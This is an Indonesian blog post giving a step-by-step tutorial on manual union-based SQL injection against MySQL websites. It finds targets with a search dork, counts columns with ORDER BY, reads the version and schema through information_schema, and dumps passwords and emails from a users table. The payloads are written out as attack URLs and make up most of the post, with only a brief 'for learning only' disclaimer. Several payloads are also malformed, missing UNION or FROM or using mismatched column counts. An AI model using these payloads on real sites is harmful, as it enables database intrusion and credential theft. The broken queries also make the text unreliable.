Popular Post

tutorial SQL injection

Posted by : cybercere Sunday, December 16, 2012


Tutorial SQL Injection Step By Step



Tutorial SQL Injection Step By Step
Pengertian SQL injection :
apa itu SQL injection?
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Untuk keterangan lebih detail silahkan di badi di http://en.wikipedia.org/wiki/SQL_injection

Yang perlu di ketahui sebelum SQL injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
contoh sekarang kita melakukan pencarian dengan kata kunci : inurl:index.php?id=

1.misal, ketemu www.contohdomain.tld/index.php?id=1
maka tambahkan ' di akhir kalimat sehingga menjadi www.contohdomain.tld/index.php?id=1'
harus ada pesan/tulisan error kalau tdk ada cari yang lain

2.mencari jumlah table dengan cara memakai order by contoh
www.contohdomain.tld/index.php?id=-1 order by 1--
itu memakai spasi

jika
www.contohdomain.tld/index.php?id=-1 order by 1-- tidak ada pesan error sperti cara 1 maka tambah 1 pada angka terakhir misal
www.contohdomain.tld/index.php?id=-1 order by 1-- di rubah jadi
www.contohdomain.tld/index.php?id=-1 order by 2--
BEGITU TERUS SAMPAI SETERUSNYA SAMPAI ADA PESAN/TULISAN ERROR
KALAU SUDAH KETEMU PADA ERROR PERTAMA MISAL
www.contohdomain.tld/index.php?id=-1 ORDER BY 9-- (ERROR PERTAMA) maka jumlah table ada 8

3.kita sudah menemukan jumlah table yaitu 8 setelah itu kita memakai cara union select

misal www.contohdomain.tld/index.php?id=1 di rubah menjadi www.contohdomain.tld/index.php?id=-1 union select 1,2,3,4,5,6,7,8--
setelah itu maka akan muncul beberapa angka dan 1 angka ada yg pling besar(SIZE nya).jika huruf paling besar adalah 3 maka:

www.contohdomain.tld/index.php?id=-1 1,2,3,@@version,5,6,7,8--
maka akan muncul versi SQL nya,jika versinya 5 kita lanjut kalau versinya 4 harus pakai SQL blind.
ini untuk versi 5:

www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

maka akan keluar beberapa tulisan.cari kata kata yg berhubungan dengan admin misalnya ada tulisan "admin" atau "users"
misal hanya ada tulisan "users"
maka kita TRANSLATE ASCII DISINI lalu kita convert to hex yaitu kata "users" tdi menjadi kode hex yg hasilnya 7573657273

kita sudah ada kode 7573657273 yg artinya adalah "users"yg kata users itu dapetnya dari www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

setelah itu kita ubah www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 information_schema.tables where table_schema=database()

- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() =? table_name=0x(tambahkan kode hex tadi) = table_name=0x7573657273

Contoh : www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

4.nah lalu ada kata kata misal password,email,id dll
kita pakai yg perlu saja.

misal dari
www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

kita rubah
-(table_name) menjadi tulisan yg ada di cara sblumnya misal password,email,id dll TETAPI CARA PEMISAHANYA HARUS MEMAKAI KODE ,0x3a,

misal url kita tdi www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(table_name),7,8 from information_schema.columns where table_name=0x7573657273--

dirubah menjadi

www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--

dan kode terakhir kita ubah juga.kita di ataskan kode hexnya adalah "users" maka kita ganti pada url
www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from information_schema.columns where table_name=0x7573657273--

akan ditranslate menjadi

www.contohdomain.tld/index.php?id=-1 union select 1,2,3,group_concat(password,0x3a,email,0x3a,id),7,8 from users--

NB : tutorial Sql Inejection di maksudkan hanya pembelajaran semata, tidak untuk merusak

Leave a Reply

blogger yang baik hati selalu memberi saran dan kritik nya..

Subscribe to Posts | Subscribe to Comments

Powered by Blogger.

- Copyright © cybercere - Date A Live - Powered by Blogger - Designed by Johanes Djogan -